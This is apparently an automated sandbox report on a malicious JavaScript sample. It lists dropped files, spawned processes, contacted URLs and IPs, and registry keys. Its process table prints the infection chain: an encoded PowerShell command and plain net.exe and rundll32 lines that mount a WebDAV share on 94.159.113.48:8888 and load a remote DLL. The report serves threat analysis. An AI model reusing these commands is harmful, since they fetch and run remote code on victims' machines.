Files

File Path | Type | Category | Malicious |
---|---|---|---|
212481723992301695.js | ASCII text, with very long lines (65536), with no line terminators | initial sample | |
C:\ProgramData\Microsoft\Network\Downloader\edb.log | data | dropped | |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | Extensible storage user DataBase, version 0x620, checksum 0x7755ad4e, page size 16384, DirtyShutdown, Windows version 10.0 | dropped | |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | data | dropped | |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_et224qok.zih.ps1 | ASCII text, with no line terminators | dropped | |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbg0jaaa.fyl.psm1 | ASCII text, with no line terminators | dropped | |
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | JSON data | dropped | |

Processes

Path | Cmdline | Malicious |
---|---|---|
C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\212481723992301695.js" | |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA0ADAAOAAxADgANQAxADAANQAyADQAMQAuAGQAbABsACwARQBuAHQAcgB5AA== | |
C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\2408185105241.dll,Entry | |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
C:\Windows\System32\net.exe | "C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\ | |
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | |

URLs

Name | IP | Malicious |
---|---|---|
http://94.159.113.48:8888/U | unknown | |
https://g.live.com/odclientsettings/ProdV21C: | unknown | |
http://94.159.113.48:8888/2 | unknown | |
http://94.159.113.48:8888/R | unknown | |
http://crl.ver) | unknown | |
https://g.live.com/odclientsettings/Prod1C: | unknown | |
https://aka.ms/pscore68 | unknown | |
http://94.159.113.48:8888/sacef | unknown | |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |
http://94.159.113.48:8888/ | unknown | |

Domains

Name | IP | Malicious |
---|---|---|
ax-0001.ax-dc-msedge.net | 150.171.29.10 | |

IPs

IP | Domain | Country | Malicious |
---|---|---|---|
94.159.113.48 | unknown | Russian Federation | |
127.0.0.1 | unknown | unknown | |

Registry

Path | Value | Malicious |
---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted | |
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS | PerfMMFileName | |

Memdumps

Base Address | Regiontype | Protect | Malicious |
---|---|---|---|